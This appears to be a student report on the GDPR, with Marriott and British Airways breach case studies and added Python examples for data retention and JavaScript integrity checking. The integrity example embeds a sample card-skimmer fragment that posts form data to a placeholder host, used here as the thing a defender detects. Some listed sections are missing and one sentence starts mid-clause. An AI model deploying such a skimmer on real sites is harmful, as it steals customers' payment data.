2019 Spring
Student Name:
London Met ID:
College ID:
I confirm that I understand my coursework needs to be submitted online via Google Classroom under the
relevant module page before the deadline in order for my assignment to be accepted and marked. I am
fully aware that late submissions will be treated as non-submission and a mark of zero will be awarded.
Abstract
The General Data Protection Regulation (GDPR) is a regulation in European Union law that has applied
since 25 May 2018 and governs data protection and privacy in the European Union. GDPR primarily focuses
on giving individuals rights over their own data. Many companies currently hold the data of customers
with or without their permission, which can harm those customers if the data is breached, or if research
is conducted on them without their consent. GDPR requires that user data is held in a protected manner
and that users can control their information, retrieve it, or request its permanent deletion. The
objective of this technical report is to show the importance of GDPR for an organization that deals with
the sensitive information of its clients.
List of figures
Table of Contents
Abstract ........ 2
List of figures ........ 3
1. Introduction ........ 8
1.1 General Information ........ 8
1.2 Background problem ........ 8
1.3 Current scenario ........ 9
2. Literature review ........ 10
2.1 Short history on data breach ........ 10
2.2 Principles of GDPR ........ 10
2.3 GDPR Compliance ........ 11
2.4 Advantages and disadvantages of GDPR ........ 12
3. Critical Analysis ........ 13
3.1 Case study 1: Marriott hotel data breach ........ 13
3.1.1 Background ........ 13
3.1.2 Issue identification ........ 13
3.1.3 Mitigation ........ 14
3.1.4 Case study summary ........ 14
3.2 Case study 2: British Airways data breach ........ 14
3.2.1 Background ........ 15
3.2.2 Issue identification ........ 15
3.2.3 Mitigation ........ 15
3.2.4 Case study summary ........ 15
4. Conclusion ........ 16
Bibliography ........ 17
1. Introduction
1.1 General Information
Over the last 15 years, technology has entered and transformed our lives tremendously. Most of
today's Internet services involve everyday transactions that demand some personal data from the
users, even for the simplest applications. As a result, huge amounts of data are collected and
combined by service providers, and by entities that track users, on a daily basis. When users
disclose these digital footprints about themselves, they often have no control over what
companies will do with them, which results in a huge information asymmetry [Bax19].
information, they can create their own marketing strategies, a political party may influence an
election, or the user may simply face security hazards when the information reaches hackers or
cyberbullies.
The importance of data protection law in Europe was thrown into focus in the wake of the
Second World War. More specifically, the use of surveillance technology by totalitarian regimes
to commit crimes against humanity, along with advances in computer science, prompted
consideration of the need for data protection legislation. The federal state of Hesse in Germany
passed the first data protection legislation in 1970 [EPRS2019].
2. Literature review
2.1 Short history on data breach
With developments in technology and in storage devices, many companies have started to store
customer information for different purposes. In recent years that stored data has been the source of
chaos, and many innocent victims have been found who were completely unaware that their
information had leaked, resulting in fraud and cyberbullying.
The figure above shows the number of data breaches per year (blue line) and the number of records
exposed, in millions (black line).
2.2 Principles of GDPR
The six data-processing principles of Article 5(1) GDPR, together with the accountability
requirement of Article 5(2), are listed below:
a) Lawfulness, fairness and transparency:
Lawfulness and fairness ensure that the data is collected from the user legally and that nothing is
hidden from the data subjects. In order to be transparent, the company should publish a privacy
policy that clearly states the types of data it collects and how it uses them.
b) Purpose limitation:
Personal data must be collected for specified, explicit and legitimate purposes and not further
processed in a manner that is incompatible with those purposes; further processing for archiving
purposes in the public interest, scientific or historical research purposes or statistical purposes
is not considered incompatible with the initial purposes. An organization should clearly state the
purpose for collecting the data, and data should only be collected if the company has a genuine
reason to collect it.
c) Data minimization:
Personal data must be adequate, relevant and limited to what is necessary in relation to the
purposes for which it is processed. Organizations must only process the personal data they need
to achieve their processing purposes. Doing so has two major benefits. First, in the event of a
data breach, the unauthorized party only gains access to a limited amount of data. Second, data
minimization makes it easier to keep data accurate and up to date.
d) Accuracy:
Personal data must be accurate and, where necessary, kept up to date; every reasonable step must
be taken to ensure that personal data that is inaccurate, having regard to the purposes for which
it is processed, is erased or rectified without delay. Accuracy is backed by the data subject's right
to rectification: an individual can ask for wrong or incomplete data to be corrected, and the
controller must act on such a request without undue delay and within one month of receiving it.
e) Storage limitation:
Personal data must be kept in a form which permits identification of data subjects for no longer
than is necessary for the purposes for which the personal data is processed; personal data may be
stored for longer periods insofar as it will be processed solely for archiving purposes in the
public interest, scientific or historical research purposes or statistical purposes, subject to the
implementation of the appropriate technical and organizational measures required by the GDPR in
order to safeguard the rights and freedoms of individuals. In practice this means the organization
needs a defined retention period for each category of data, and a process that deletes or
anonymizes the data when that period expires.
f) Integrity and confidentiality:
Personal data must be processed in a manner that ensures appropriate security, including
protection against unauthorized or unlawful processing and against accidental loss, destruction
or damage, using appropriate technical or organizational measures. Integrity and confidentiality
deal with the security of the data: the data stored by the company must be secured and must not
be disclosed to unauthorized parties. The organization should have a proper strategy and policy to
make sure that user data is in safe hands.
g) Accountability:
The controller is responsible for complying with the principles above and must be able to
demonstrate that compliance; it is therefore answerable for any leakage or other failure [ICO19].
2.3 GDPR Compliance
a) Data mapping:
Data mapping helps us understand how data moves inside our company. Mapping the flow of data
helps us identify the areas that cause problems in implementing GDPR. A data map makes clear the
purpose of each item of data and its type, and describes how the data is used and how it is
properly disposed of.
Figure 2: Data map example
The figure above shows a simple example of a GDPR data map, which describes the origin of the
data and how it is handled.
b) Privacy policy:
We should regularly review our privacy policy and our GDPR compliance. You must communicate to
individuals the legal basis for processing their data, the retention period, their right to complain
to the supervisory authority if they are unhappy with how their data is handled, whether their data
will be subject to automated decision-making, and their rights under the GDPR.
c) Training:
The GDPR is a business change project; the people you work with need to understand the importance of
data protection and be trained in the basic principles of the GDPR and in the procedures being
implemented for compliance [Jam18].
3. Critical Analysis
3.1 Case study 1: Marriott hotel data breach
3.1.1 Background
On November 30, 2018 Marriott disclosed that the reservation system of its subsidiary
Starwood Hotels & Resorts Worldwide had been breached. Marriott stated that the breach had
actually begun in 2014 and had only recently been detected. That is a horrendously long dwell
time by anyone's standards. The breach of the Starwood structured data store resulted in the theft
of highly sensitive personal information of approximately 500 million guests, including names,
mailing addresses, phone numbers, email addresses, passport numbers and, in some cases,
encrypted payment card information. While Marriott is a U.S. corporation, many of its guests
over this period will certainly have been citizens of the European Union (EU). As such, the
breach falls under the EU GDPR. This means Marriott could face a fine of up to 4% of its
annual global turnover, which in this case would be around $900M [DBC18].
Figure: Marriott data breach [Amb18].
3.1.3 Mitigation
The GDPR rules were not properly followed: remote access to the reservation system was not
monitored properly and the compromise went undetected for four years, so proper implementation
of the GDPR rules would be the most effective measure. Database security must be the top
priority, and the detection mechanisms must be far more effective, since it took Marriott four
years to detect the breach [Amb18]. It is also seen that guest data was stored for a very long
period of time, including data that was not used on a daily basis and was no longer useful to
the company, whereas under the storage limitation principle personal data must be kept no longer
than is necessary for its purpose. To mitigate such flaws in the future the company can implement
a retention policy under which sensitive data such as payment card numbers, phone numbers, travel
history and addresses is automatically deleted once the transaction is complete and the retention
period has passed.
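The storage limitation principle in section 2.2 and the retention policy proposed above both come down to the same mechanism: a job that strips data whose purpose is fulfilled and purges whole records once their retention period expires. The Python below is an added example written for this report, not Marriott's code or any real reservation system; the retention period of 365 days, the rule that card data is dropped once a booking is settled, the legal-hold flag and the guest records are all constructed assumptions for the illustration.

```python
"""
Retention and data-minimisation enforcement over a constructed set of guest
records. Added example, not code from Marriott or any real system. The
retention period, field names and records below are assumptions chosen for
the illustration, not figures taken from the GDPR.
"""
from dataclasses import dataclass, replace
from datetime import date, timedelta
from typing import Dict, List, Optional, Tuple

# Hypothetical policy: once a booking is settled the card data has served its
# purpose and is dropped; the remaining guest record is purged RETENTION_DAYS
# after the last stay, unless a legal hold (e.g. a live dispute) applies.
RETENTION_DAYS = 365
DROP_AFTER_SETTLEMENT = {"card_number", "card_expiry"}


@dataclass(frozen=True)
class GuestRecord:
    guest_id: str
    last_stay: date
    settled: bool
    legal_hold: bool
    data: Dict[str, str]


def minimise(record: GuestRecord, today: date) -> Optional[GuestRecord]:
    """Apply the policy to one record. Returns None if the whole record must go."""
    expired = today - record.last_stay > timedelta(days=RETENTION_DAYS)
    if expired and not record.legal_hold:
        return None  # storage limitation: past retention, purge everything
    data = dict(record.data)  # copy; never mutate the caller's object
    if record.settled:
        for field_name in DROP_AFTER_SETTLEMENT:
            data.pop(field_name, None)  # purpose fulfilled, data no longer needed
    return replace(record, data=data)


def enforce(records: List[GuestRecord], today: date) -> Tuple[List[GuestRecord], List[str]]:
    """Return (records to keep, ids of records to purge)."""
    kept, purged = [], []
    for rec in records:
        out = minimise(rec, today)
        if out is None:
            purged.append(rec.guest_id)
        else:
            kept.append(out)
    return kept, purged


def fields_held(records: List[GuestRecord]) -> Dict[str, List[str]]:
    """Inventory of which personal-data fields each kept record still carries;
    this is the kind of output a data map (section 2.3) is built from."""
    return {r.guest_id: sorted(r.data) for r in records}


# Constructed sample data (not real guests).
TODAY = date(2019, 3, 1)
SAMPLE = [
    GuestRecord("g1", date(2018, 12, 10), settled=True, legal_hold=False,
                data={"name": "A. Guest", "passport_number": "X1234567",
                      "card_number": "4111111111111111", "card_expiry": "12/21"}),
    GuestRecord("g2", date(2014, 7, 4), settled=True, legal_hold=False,
                data={"name": "B. Guest", "address": "1 Example St",
                      "card_number": "4222222222222"}),
    GuestRecord("g3", date(2019, 2, 20), settled=False, legal_hold=False,
                data={"name": "C. Guest", "card_number": "4333333333333333",
                      "card_expiry": "01/22"}),
    GuestRecord("g4", date(2016, 1, 15), settled=True, legal_hold=True,
                data={"name": "D. Guest", "card_number": "4444444444444444"}),
]

if __name__ == "__main__":
    kept, purged = enforce(SAMPLE, TODAY)
    print("purged:", purged)            # purged: ['g2']
    print("kept:", fields_held(kept))   # g1 and g4 no longer carry card data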
3.2 Case study 2: British Airways data breach
3.2.1 Background
The data breach suffered by British Airways affected around 380,000 customers and resulted in
the theft of customer data including personal and financial details. The attack was highly
targeted and utilized customized JavaScript card skimmers loaded from a compromised web
server [Ole18]. British Airways is a major international airline, and over the course of about two
weeks it suffered a huge data breach; the UK Information Commissioner's Office subsequently
announced its intention to fine the airline £183 million for failing to protect customer data as
the GDPR requires.
3.2.3 Mitigation:
The best measure to mitigate such a data breach is to perform regular security checks and
vulnerability assessments by an expert, including integrity checks on the scripts the website
serves, since the skimmer was delivered through JavaScript on the site itself. As per the GDPR,
any personal data stored in a system must have a genuine reason to be there, so sensitive data
that is not required in the future should be removed automatically in order to reduce the impact
of a breach. In the event of a breach the incident should be reported internally immediately and
notified to the supervisory authority within 72 hours of becoming aware of it. Data stored in a
database should be properly encrypted so that it provides extra protection if the database is
exposed. In this case code was injected into the website, which means whoever did it had write
access to the web server or its assets; whether that was an outsider or an insider, there should
be regular access control reviews, and the access of former employees should be removed
immediately.
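The "regular security check" that would have caught this class of attack is an integrity check on the site's own JavaScript: every released script is hashed at build time, and what the web server actually serves is compared against that baseline. The Python below is an added example written for this report, not code from British Airways or from the Magecart group; the file names, the checkout script and the appended skimmer fragment are all constructed, and the hash format used is the one the HTML Subresource Integrity (SRI) attribute expects.

```python
"""
Integrity check of first-party JavaScript against a known-good baseline,
modelling the class of attack in the British Airways case (a skimmer added
to a script the site itself serves). Added example, not British Airways' or
Magecart's code. All file names and script bodies below are constructed.
"""
import base64
import hashlib
from typing import Dict, List


def sri_hash(content: bytes, algo: str = "sha256") -> str:
    """Hash in the format used by the HTML Subresource Integrity attribute."""
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def build_baseline(assets: Dict[str, bytes]) -> Dict[str, str]:
    """Record the expected hash of every script at release time. In practice
    the baseline lives outside the web tier (e.g. in the build pipeline), so a
    compromised web server cannot rewrite it along with the scripts."""
    return {path: sri_hash(body) for path, body in assets.items()}


def verify(baseline: Dict[str, str], served: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Compare what the server is currently serving with the baseline."""
    report = {"ok": [], "modified": [], "missing": [], "unexpected": []}
    for path, expected in baseline.items():
        if path not in served:
            report["missing"].append(path)
        elif sri_hash(served[path]) == expected:
            report["ok"].append(path)
        else:
            report["modified"].append(path)   # content differs from the release
    for path in served:
        if path not in baseline:
            report["unexpected"].append(path)  # a script nobody released
    return {k: sorted(v) for k, v in report.items()}


def script_tag(src: str, content: bytes) -> str:
    """Emit a <script> tag pinned to the released content with SRI."""
    return (f'<script src="{src}" integrity="{sri_hash(content)}" '
            f'crossorigin="anonymous"></script>')


# Constructed release: what the developers shipped.
RELEASED = {
    "/static/js/app.js": b"window.app = {version: '1.0'};\n",
    "/static/js/checkout.js": (
        b"function submitPayment(form) {\n"
        b"  return fetch('/api/pay', {method: 'POST', body: new FormData(form)});\n"
        b"}\n"),
}

# Constructed state of the web server after a compromise: checkout.js has a
# skimmer-like fragment appended that copies form fields to a third-party host
# (placeholder name), and an extra script appeared that was never released.
SKIMMER = (
    b"document.addEventListener('submit', function (e) {\n"
    b"  var d = Object.fromEntries(new FormData(e.target));\n"
    b"  navigator.sendBeacon('https://collector.example.invalid/', JSON.stringify(d));\n"
    b"});\n")
SERVED = {
    "/static/js/app.js": RELEASED["/static/js/app.js"],
    "/static/js/checkout.js": RELEASED["/static/js/checkout.js"] + SKIMMER,
    "/static/js/vendor-extra.js": b"/* file not present in the release */\n",
}

if __name__ == "__main__":
    baseline = build_baseline(RELEASED)
    print(verify(baseline, SERVED))
    print(script_tag("/static/js/checkout.js", RELEASED["/static/js/checkout.js"]))
```

Two points matter when using this. First, the SRI attribute only protects a script the browser loads from somewhere the attacker could not also rewrite (a separate CDN origin, say); if the same compromised server serves both the HTML and the script, the attacker simply updates the integrity attribute too, so the comparison in verify() must be run from outside the web tier, such as from the build pipeline or a scheduled external fetch. Second, the "unexpected" list is as important as "modified": a skimmer can just as well arrive as a new file referenced from a changed page as by editing an existing one.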
3.2.4 Case study summary
In 2018 British Airways suffered a huge data breach, attributed to the group called Magecart,
resulting in the loss of 380,000 customers' data including personal and financial details. Due to
a lack of proper precautions the attackers were able to inject their code into the website, which
caused the loss of data and of company reputation. British Airways' IT personnel were unable to
find the flaw in their system in time, resulting in a huge proposed fine for not implementing the
GDPR rules properly.
4. Conclusion
In the modern world data is one of the most valuable assets and has great significance, since it
can reveal a lot about a person. Many companies collect data so that it can be used in the future
for different purposes. All of that data should be protected in a proper manner and used only for
the benefit of the person concerned. GDPR ensures that everything that happens to the data is done
on a lawful basis, normally with the permission of the user, benefits the user, and keeps the data
in a safe place.
GDPR is a set of rules which has to be followed strictly by companies and which ensures the
safety of data. In recent years data has been leaked and has caused a loss, or the threat of a loss,
of privacy to users. The GDPR also spells out the consequences a company faces if it does not
follow the rules and data gets leaked: the fines for violating the rules can be very large,
resulting in a huge financial loss to the company. In this way GDPR ensures the safety of user data
by encouraging companies to follow best practice to protect it.
Bibliography
Infosecurity Europe (2019). Retrieved from
https://www.infosecurityeurope.com/__novadocuments/355669?v=636289786574700000